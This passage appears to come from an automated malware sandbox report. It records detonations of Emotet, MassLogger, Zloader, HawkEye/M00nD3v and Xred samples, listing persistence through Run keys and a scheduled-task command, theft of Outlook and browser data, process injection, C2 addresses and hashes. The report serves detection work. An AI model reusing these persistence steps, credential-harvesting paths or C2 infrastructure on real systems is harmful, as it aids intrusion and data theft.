SHA256 f48e66d51e27aeba28e5c95361e5c1afb28f1a5bdb043cbc9b12af581e6a9141
SHA512 04f0a0e0b5ee7761ae1046ea17f386d59072997ec64ccc755727f3a744301a8dc7f71d962a10323ae3e1becedfe615bb4b979800f12af9f7a819edc32877bb7a

memory/3340-22-0x0000000000400000-0x0000000004EE3000-memory.dmp

memory/4040-25-0x0000000000400000-0x0000000004EE3000-memory.dmp

memory/3340-28-0x0000000000400000-0x0000000004EE3000-memory.dmp

memory/3340-378-0x0000000000400000-0x0000000004EE3000-memory.dmp

Analysis: behavioral3

Detonation Overview

Submitted

2024-12-04 19:31

Reported

2024-12-04 19:36

Platform

win10v2004-20241007-en

Max time kernel

136s

Max time network

148s

Command Line

"C:\Users\Admin\AppData\Local\Temp\emotet_exe_e1_ef536781ae8be4b67a7fb8aa562d84994ad250d97d5606115b6f4e6e2992363f_2020-11-17__174504.exe"

Signatures

Emotet

trojan banker emotet

Emotet family

emotet

Emotet payload

trojan banker
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\BTAGService\ole2nls.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\SysWOW64\BTAGService\ole2nls.exe C:\Users\Admin\AppData\Local\Temp\emotet_exe_e1_ef536781ae8be4b67a7fb8aa562d84994ad250d97d5606115b6f4e6e2992363f_2020-11-17__174504.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\emotet_exe_e1_ef536781ae8be4b67a7fb8aa562d84994ad250d97d5606115b6f4e6e2992363f_2020-11-17__174504.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\BTAGService\ole2nls.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\emotet_exe_e1_ef536781ae8be4b67a7fb8aa562d84994ad250d97d5606115b6f4e6e2992363f_2020-11-17__174504.exe

"C:\Users\Admin\AppData\Local\Temp\emotet_exe_e1_ef536781ae8be4b67a7fb8aa562d84994ad250d97d5606115b6f4e6e2992363f_2020-11-17__174504.exe"

C:\Windows\SysWOW64\BTAGService\ole2nls.exe

"C:\Windows\SysWOW64\BTAGService\ole2nls.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 138.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 12.163.208.58:80 tcp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 241.42.69.40.in-addr.arpa udp
US 8.8.8.8:53 182.129.81.91.in-addr.arpa udp
US 45.33.35.74:8080 tcp
DE 87.106.253.248:8080 tcp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 192.241.146.84:8080 tcp
NL 190.115.18.139:8080 tcp
US 65.36.62.20:80 tcp
BR 170.81.48.2:80 tcp

Files

memory/4168-4-0x00000000022F0000-0x0000000002300000-memory.dmp

memory/4168-0-0x0000000002280000-0x0000000002292000-memory.dmp

memory/4168-7-0x0000000002270000-0x000000000227F000-memory.dmp

C:\Windows\SysWOW64\BTAGService\ole2nls.exe

MD5 cbe9aa4dce4217491cf9bffae2c66537
SHA1 2b7a15303157f8b9f1cce01e5e7a130628eb2c22
SHA256 ef536781ae8be4b67a7fb8aa562d84994ad250d97d5606115b6f4e6e2992363f
SHA512 71e2736fafa1be308ef341a937a1c6d0dc5a311952bfb9bfbd492c2e16950508f1aea5e63a8e3614c9a35cdc6a684d3ff6e2dba38fe483af74508d3df41262a5

memory/4168-9-0x0000000000400000-0x0000000000484000-memory.dmp

memory/220-14-0x0000000000610000-0x0000000000620000-memory.dmp

memory/220-10-0x0000000000630000-0x0000000000642000-memory.dmp

Analysis: behavioral19

Detonation Overview

Submitted

2024-12-04 19:31

Reported

2024-12-04 19:36

Platform

win10v2004-20241007-en

Max time kernel

91s

Max time network

156s

Command Line

"C:\Users\Admin\AppData\Local\Temp\mouse_2.exe"

Signatures

MassLogger

stealer spyware masslogger

MassLogger Main payload

Description Indicator Process Target
N/A N/A N/A N/A

Masslogger family

masslogger

ReZer0 packer

rezer0
Description Indicator Process Target
N/A N/A N/A N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\mouse_2.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\mouse_2.exe N/A

Reads user/profile data of web browsers

spyware stealer

Accesses Microsoft Outlook profiles

collection
Description Indicator Process Target
Key queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook C:\Users\Admin\AppData\Local\Temp\mouse_2.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\mouse_2.exe N/A
Key queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\mouse_2.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\mouse_2.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook C:\Users\Admin\AppData\Local\Temp\mouse_2.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\mouse_2.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\mouse_2.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook C:\Users\Admin\AppData\Local\Temp\mouse_2.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\mouse_2.exe N/A
Key queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\mouse_2.exe N/A
Key queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook C:\Users\Admin\AppData\Local\Temp\mouse_2.exe N/A
Key queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\mouse_2.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook C:\Users\Admin\AppData\Local\Temp\mouse_2.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\mouse_2.exe N/A
Key queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook C:\Users\Admin\AppData\Local\Temp\mouse_2.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\mouse_2.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\mouse_2.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\mouse_2.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A api.ipify.org N/A N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 3156 set thread context of 4720 N/A C:\Users\Admin\AppData\Local\Temp\mouse_2.exe C:\Users\Admin\AppData\Local\Temp\mouse_2.exe

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\mouse_2.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\mouse_2.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\mouse_2.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\mouse_2.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\mouse_2.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\mouse_2.exe N/A

outlook_office_path

Description Indicator Process Target
Key queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\mouse_2.exe N/A

outlook_win_path

Description Indicator Process Target
Key queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\mouse_2.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\mouse_2.exe

"C:\Users\Admin\AppData\Local\Temp\mouse_2.exe"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\aqkfZm" /XML "C:\Users\Admin\AppData\Local\Temp\tmpCFFD.tmp"

C:\Users\Admin\AppData\Local\Temp\mouse_2.exe

"{path}"

Network

Country Destination Domain Proto
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 85.49.80.91.in-addr.arpa udp
US 8.8.8.8:53 2.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 56.163.245.4.in-addr.arpa udp
US 8.8.8.8:53 241.42.69.40.in-addr.arpa udp
US 8.8.8.8:53 73.190.18.2.in-addr.arpa udp
US 8.8.8.8:53 22.49.80.91.in-addr.arpa udp
US 8.8.8.8:53 api.ipify.org udp
US 104.26.12.205:80 api.ipify.org tcp
US 8.8.8.8:53 205.12.26.104.in-addr.arpa udp
US 8.8.8.8:53 43.229.111.52.in-addr.arpa udp

Files

memory/3156-0-0x00000000750CE000-0x00000000750CF000-memory.dmp

memory/3156-1-0x0000000000F30000-0x000000000102C000-memory.dmp

memory/3156-2-0x0000000007F40000-0x0000000008000000-memory.dmp

memory/3156-3-0x000000000B7B0000-0x000000000BD54000-memory.dmp

memory/3156-4-0x000000000B3A0000-0x000000000B432000-memory.dmp

memory/3156-5-0x00000000750C0000-0x0000000075870000-memory.dmp

memory/3156-6-0x0000000005B60000-0x0000000005B6A000-memory.dmp

memory/3156-7-0x0000000006A90000-0x0000000006A98000-memory.dmp

memory/3156-8-0x00000000750CE000-0x00000000750CF000-memory.dmp

memory/3156-9-0x00000000750C0000-0x0000000075870000-memory.dmp

memory/3156-10-0x0000000007160000-0x00000000071FC000-memory.dmp

memory/3156-11-0x0000000007380000-0x000000000742E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\tmpCFFD.tmp

MD5 ab6ef14bbdee8c6ad96136f5c675f0e1
SHA1 b037ff482478fda0a5ee4e7054658a4a5e3cf74b
SHA256 228fb9edb9559964f1a50a48e044f24be3ac2c9c84e0c6d3e5791e7d4e2eb3d4
SHA512 f5b26b8330f2d9a36dfcf245531382e9a329136267aa71033f7603f1976796bde468c40e9b1d1938d7d165ade9206f5461ba4271295a6de28cb4b2b2dc7aa57a

memory/4720-15-0x0000000000400000-0x00000000004A8000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\mouse_2.exe.log

MD5 400f1cc1a0a0ce1cdabda365ab3368ce
SHA1 1ecf683f14271d84f3b6063493dce00ff5f42075
SHA256 c8fa64f4b69df13ed6408fd4a204f318a36c2f38c85d4a4d42adfc9173f73765
SHA512 14c8cfd58d097e5e89c8cabe1e665173f1ccf604a9ef70cdcb84116e265f90819c19c891be408e0ad7e29086a5c2ea2883b7a7d1184878dbbac63e2cabcd1c45

memory/4720-18-0x00000000750C0000-0x0000000075870000-memory.dmp

memory/3156-21-0x00000000750C0000-0x0000000075870000-memory.dmp

memory/4720-20-0x00000000750C0000-0x0000000075870000-memory.dmp

memory/4720-19-0x00000000053B0000-0x00000000053F4000-memory.dmp

memory/4720-22-0x00000000056D0000-0x0000000005736000-memory.dmp

memory/4720-23-0x00000000750C0000-0x0000000075870000-memory.dmp

memory/4720-31-0x00000000750C0000-0x0000000075870000-memory.dmp

memory/4720-35-0x0000000008080000-0x00000000080D0000-memory.dmp

memory/4720-36-0x00000000750C0000-0x0000000075870000-memory.dmp

memory/4720-37-0x00000000750C0000-0x0000000075870000-memory.dmp

memory/4720-48-0x00000000750C0000-0x0000000075870000-memory.dmp

Analysis: behavioral29

Detonation Overview

Submitted

2024-12-04 19:31

Reported

2024-12-04 19:36

Platform

win10v2004-20241007-en

Max time kernel

91s

Max time network

155s

Command Line

"C:\Users\Admin\AppData\Local\Temp\wwf[1].exe"

Signatures

Zloader family

zloader

Zloader, Terdot, DELoader, ZeusSphinx

trojan botnet zloader

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Egnuhu = "C:\\Users\\Admin\\AppData\\Roaming\\Idiq\\waytol.exe" C:\Windows\SysWOW64\msiexec.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 4572 set thread context of 4280 N/A C:\Users\Admin\AppData\Local\Temp\wwf[1].exe C:\Windows\SysWOW64\msiexec.exe

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\msiexec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\wwf[1].exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\wwf[1].exe

"C:\Users\Admin\AppData\Local\Temp\wwf[1].exe"

C:\Windows\SysWOW64\msiexec.exe

msiexec.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 180.129.81.91.in-addr.arpa udp
US 8.8.8.8:53 73.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 212.20.149.52.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 militanttra.at udp
US 8.8.8.8:53 militanttra.at udp
US 8.8.8.8:53 militanttra.at udp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp

Files

memory/4572-0-0x0000000000533000-0x0000000000536000-memory.dmp

memory/4572-1-0x0000000000340000-0x000000000058C000-memory.dmp

memory/4572-2-0x0000000000340000-0x000000000058C000-memory.dmp

memory/4572-4-0x0000000000533000-0x0000000000536000-memory.dmp

memory/4280-10-0x0000000000A40000-0x0000000000A6C000-memory.dmp

memory/4572-12-0x0000000000340000-0x000000000058C000-memory.dmp

memory/4280-14-0x0000000000A40000-0x0000000000A6C000-memory.dmp

memory/4280-15-0x0000000000A40000-0x0000000000A6C000-memory.dmp

Analysis: behavioral13

Detonation Overview

Submitted

2024-12-04 19:31

Reported

2024-12-04 19:36

Platform

win10v2004-20241007-en

Max time kernel

144s

Max time network

156s

Command Line

"C:\Users\Admin\AppData\Local\Temp\hyundai steel-pipe- job 8010(1).exe"

Signatures

HawkEye Reborn

keylogger trojan stealer spyware hawkeye_reborn

Hawkeye_reborn family

hawkeye_reborn

M00nd3v_Logger

stealer spyware m00nd3v_logger

M00nd3v_logger family

m00nd3v_logger

M00nD3v Logger payload

infostealer
Description Indicator Process Target
N/A N/A N/A N/A

Reads user/profile data of web browsers

spyware stealer

Accesses Microsoft Outlook profiles

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\hyundai steel-pipe- job 8010(1).exe N/A
Key opened \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\hyundai steel-pipe- job 8010(1).exe N/A
Key opened \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\hyundai steel-pipe- job 8010(1).exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A bot.whatismyipaddress.com N/A N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 3620 set thread context of 3632 N/A C:\Users\Admin\AppData\Local\Temp\hyundai steel-pipe- job 8010(1).exe C:\Users\Admin\AppData\Local\Temp\hyundai steel-pipe- job 8010(1).exe

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\hyundai steel-pipe- job 8010(1).exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\hyundai steel-pipe- job 8010(1).exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\hyundai steel-pipe- job 8010(1).exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\hyundai steel-pipe- job 8010(1).exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\hyundai steel-pipe- job 8010(1).exe N/A

outlook_office_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\hyundai steel-pipe- job 8010(1).exe N/A

outlook_win_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\hyundai steel-pipe- job 8010(1).exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\hyundai steel-pipe- job 8010(1).exe

"C:\Users\Admin\AppData\Local\Temp\hyundai steel-pipe- job 8010(1).exe"

C:\Users\Admin\AppData\Local\Temp\hyundai steel-pipe- job 8010(1).exe

"{path}"

Network

Country Destination Domain Proto
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 181.129.81.91.in-addr.arpa udp
US 8.8.8.8:53 4.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 bot.whatismyipaddress.com udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 85.49.80.91.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 21.236.111.52.in-addr.arpa udp

Files

memory/3620-0-0x0000000074BE2000-0x0000000074BE3000-memory.dmp

memory/3620-1-0x0000000074BE0000-0x0000000075191000-memory.dmp

memory/3620-2-0x0000000074BE0000-0x0000000075191000-memory.dmp

memory/3620-3-0x0000000074BE0000-0x0000000075191000-memory.dmp

memory/3632-4-0x0000000000400000-0x0000000000490000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v2.0_32\UsageLogs\hyundai steel-pipe- job 8010(1).exe.log

MD5 fad44290d2f569240416a287677a6b34
SHA1 0799266664e37852987cc24398f9a70c7e56742b
SHA256 e955c99499359471526e95c22a084d1578997c39ecab988badf6798cfbd995b0
SHA512 ee4136ac147d41646368eeb16390598c1da2b9e3bb8331b43062a72e4ad1d05eec56dcc727f9b5b447756c3edc855b08ef0c241073a5f88e749714f2beb98bc3

memory/3632-8-0x0000000074BE0000-0x0000000075191000-memory.dmp

memory/3620-7-0x0000000074BE0000-0x0000000075191000-memory.dmp

memory/3632-10-0x0000000074BE0000-0x0000000075191000-memory.dmp

memory/3632-9-0x0000000074BE0000-0x0000000075191000-memory.dmp

memory/3632-11-0x0000000074BE0000-0x0000000075191000-memory.dmp

memory/3632-13-0x0000000074BE0000-0x0000000075191000-memory.dmp

memory/3632-14-0x0000000074BE0000-0x0000000075191000-memory.dmp

Analysis: behavioral15

Detonation Overview

Submitted

2024-12-04 19:31

Reported

2024-12-04 19:36

Platform

win10v2004-20241007-en

Max time kernel

142s

Max time network

157s

Command Line

"C:\Users\Admin\AppData\Local\Temp\infected dot net installer.exe"

Signatures

Xred

backdoor xred

Xred family

xred

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\infected dot net installer.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation C:\ProgramData\Synaptics\Synaptics.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Synaptics Pointing Device Driver = "C:\\ProgramData\\Synaptics\\Synaptics.exe" C:\Users\Admin\AppData\Local\Temp\infected dot net installer.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\ProgramData\Synaptics\Synaptics.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\b319ec1c324fd5da558d6fda\Setup.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\3b29b07001e8d6eb1d0fc429\Setup.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\infected dot net installer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\._cache_infected dot net installer.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\b319ec1c324fd5da558d6fda\Setup.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\b319ec1c324fd5da558d6fda\Setup.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\3b29b07001e8d6eb1d0fc429\Setup.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\3b29b07001e8d6eb1d0fc429\Setup.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ C:\Users\Admin\AppData\Local\Temp\infected dot net installer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02 C:\3b29b07001e8d6eb1d0fc429\Setup.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\SniffedFolderType = "Documents" C:\3b29b07001e8d6eb1d0fc429\Setup.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = ffffffff C:\3b29b07001e8d6eb1d0fc429\Setup.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlgLegacy\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\LogicalViewMode = "1" C:\3b29b07001e8d6eb1d0fc429\Setup.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlgLegacy\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\IconSize = "16" C:\3b29b07001e8d6eb1d0fc429\Setup.exe N/A
